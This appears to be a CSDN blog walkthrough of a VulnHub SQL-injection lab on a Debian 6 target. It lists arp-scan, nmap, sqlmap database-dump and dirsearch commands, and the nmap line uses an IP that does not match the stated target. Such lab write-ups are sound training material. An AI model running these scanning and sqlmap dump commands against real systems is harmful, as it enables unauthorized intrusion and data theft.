SQL注入~Debian6靶机渗透

于 2024-07-31 08:28:24 发布
阅读量273 收藏 3
点赞数 6
分类专栏: 靶场练习 文章标签: 网络安全 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/140787303
版权

在这里插入图片描述

准备工作

# 环境准备
Debian6靶机(192.168.66.133)
//下载地址:https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso
kali-linux攻击机(192.168.66.190)

主机发现

# 扫描该网段下的所有主机
arp-scan -l

image-20240729214023562

端口扫描

# 对靶机192.168.66.133进行端口扫描
nmap -A -sV -p- 192.168.48.138

image-20240729214524330

# 然后对80端口进行访问

image-20240729214658456

# 然后在页面中发现cat.php?id=1这个页面

image-20240729220702607

有无sql注入

# 注入判断
python3 sqlmap.py -u "http://192.168.66.133/cat.php?id=1" --batch

image-20240729220812619

# 发现有sql注入,开始爆数据库名
python3 sqlmap.py -u "http://192.168.66.133/cat.php?id=1" --batch -dbs

image-20240729221312202

# 爆数据库的表名和字段
python3 sqlmap.py -u "http://192.168.66.133/cat.php?id=1" --batch -D photoblog -dump-all

image-20240729221851523

目录扫描

# 对192.168.66.133进行目录扫描
dirsearch -u http://192.168.66.133/

image-20240729223110772

# 发现/admin/login.php有点可疑
# 访问192.168.66.133/admin/login.php

image-20240729223611893

登录成功

# 牛逼

image-20240729223809455

好小子,离成功又近一步!!!

蚂蚱.top
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4110
一次简单的SQL注入靶场练习
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1042
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
DC-9靶机渗透详细流程
braty_的博客
02-09 810
DC-9靶机详细流程
DC-7靶机渗透详细流程
braty_的博客
02-07 1527
DC-7靶机渗透详细流程
docker-ce_18.06.3~ce~3-0~debian_arm64.deb
08-10
docker-ce_18.06.3~ce~3-0~debian_arm64.deb
Debian6 Mysql5.6 deb安装包
01-28
Debian6 Mysql5.6 deb安装包及相关依赖,亲测可用(libaio,libaiodev,debian-keyring) 安装方式: sudo dpkg -i mysql-5.6.10-debian6.0-x86_64.deb sudo /opt/mysql/server-5.6/support-files/mysql.server start ...
docker-ce-cli_18.09.0~3-0~debian-stretch_arm64.deb
07-23
docker-ce-cli_18.09.0~3-0
DebianToolkit:Debian自定义渗透
05-08
Debian自定义渗透 安装 root @ debian:~# apt-get install git -y root @ debian:~# cd ~ root @ debian:~# git clone https://github.com/d4t4s3c/DebianToolkit.git root @ debian:~# cd DebianToolkit root @ ...
debian6配置mysql允许远程连接的方法(图)
09-10
Debian 6这样的Linux操作系统上配置MySQL允许远程连接,是很多系统管理员和开发者必须掌握的技能。本篇文章将详细讲解如何在Debian 6上设置MySQL远程访问权限。 首先,确保您已经安装了MySQL服务器。在Debian 6中...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何安全的申请SSL证书
2401_86337938的博客
07-22 1558
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 705
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2585
MySQL基线检查,基线配置,安全加固
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1018
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
SQL 新手教程 1/20】SQL语言&MySQL数据库 简介
哒哒哒哒 哒哒
07-25 361
访问和处理关系数据库的计算机标准语言。💗 为什么需要数据库?⭐ 专门管理数据,应用程序不需要自己管理数据,而是通过数据库软件提供的。
会Excel就会sql
svygh123的专栏
07-20 1350
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+Overlayfs权限提升
07-25 469
#SQLI #图片数据隐写文件提取 #Binwalk #Foremost #Pkexec权限提升 #Overlayfs权限提升
Mybatis(四)特殊SQL的查询:模糊查询、批量删除、动态设置表明、添加功能获取自增的主键
最新发布
m0_73864806的博客
07-26 410
不适用#{ },’%?%‘ 问号是属于字符串的一部分 不会被解析成占位符,会被当作是我们字符串的一部分来解析,所以我们执行的语句中找不到占位符,但是我们却为占位符进行了赋值,所以说就会报错。#{ } 还是不使适用,会产生 ' ' ,动态设置表名的时候不可以带 ' '#{ } 在sql语句中被解析之后本身就会加上一个单引号 ' '我们使用${ } ,将#{}替换成${ }不可以使用#{} 需要使用${ }使用字符串拼接的方法。字符串 日期 字段名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值